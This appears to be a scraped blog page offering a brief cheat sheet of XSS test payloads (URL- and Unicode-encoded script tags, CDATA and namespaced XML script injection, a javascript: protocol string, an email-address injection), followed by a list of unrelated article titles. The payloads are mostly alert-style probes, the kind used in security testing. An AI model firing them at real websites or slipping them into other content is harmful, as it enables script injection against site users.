当前位置:网站首页>Quick check list of various XSS payloads
Quick check list of various XSS payloads
2022-07-24 11:51:00 【Sumarua】
Various XSS Payload Quick check list
Blind XSS
https://xsshunter.com/
Encoding
%u003Cscript%u003Eprompt%u0028303%u0029%u003C/script%u003E
%253Cscript%253Ealert(1)%253C%252Fscript%253E
%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
XML Based XSS
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
Where / is required after protocol
javascript://%250aalert(1)
XSS in email ID
"\"><s>test"@gmail.com
边栏推荐
- The difference between where and having
- How to use a third party without obtaining root permission topic: MIUI chapter
- 哈希——242.有效的字母异位词
- Dry goods sharing - taking over a new data team as a lead - Problem Inventory and insights findings
- Shell Scripting tips
- Collision, removal and cleaning
- L2-011 玩转二叉树
- Recommended SSH cross platform terminal tool tabby
- L2-011 play with binary tree
- CCF 201803_ 1 jump jump
猜你喜欢

有关并行的两个重要定律

Easy to use example

安装jmeter

What is the charm of CSDN members? What's the use of him?

Svn server and client installation (Chinese package) and simple use

Install MariaDB columnstore (version 10.3)

Ctfshow ThinkPHP topic 1

Shell script "< < EOF" my purpose and problems

三、MFC消息映射机制实现原理

DevOps及DevOps常用的工具介绍
随机推荐
Agile? DevOps ?
Types and history of bugs in it circle
Cgo+gsoap+onvif learning summary: 9. Go and C conduct socket communication and onvif protocol processing
Win10 icon turns white, recovery method
Install MariaDB columnstore (version 10.3)
Source code analysis sentry user behavior record implementation process
Notes on @enableconfigurationproperties
Easy to use example
Introduction to Devops and common Devops tools
Jackson parsing JSON detailed tutorial
Common formulas and application scenarios of discrete distribution
Experience of redis deepwater area -- Interview reference
Collision, removal and cleaning
Basic usage of GCC
第0章 前言和环境配置
Microservice - eruka
Operational amplifier - Notes on rapid recovery [II] (application)
Sorting out the ideas of data processing received by TCP server, and the note of select: invalid argument error
Makefile quick use
使用Prometheus+Grafana实时监控服务器性能